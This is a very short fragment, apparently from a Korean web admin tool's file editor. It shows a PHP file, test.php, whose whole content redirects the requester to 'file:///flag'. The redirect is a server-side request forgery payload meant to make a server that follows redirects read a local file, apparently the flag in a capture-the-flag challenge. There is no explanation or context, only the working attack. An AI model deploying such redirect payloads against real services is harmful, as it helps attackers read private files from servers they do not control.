관리-도구
편집 파일: test.php
<?php header('HTTP/1.1 301 Found'); header('Location: file:///flag'); exit; ?>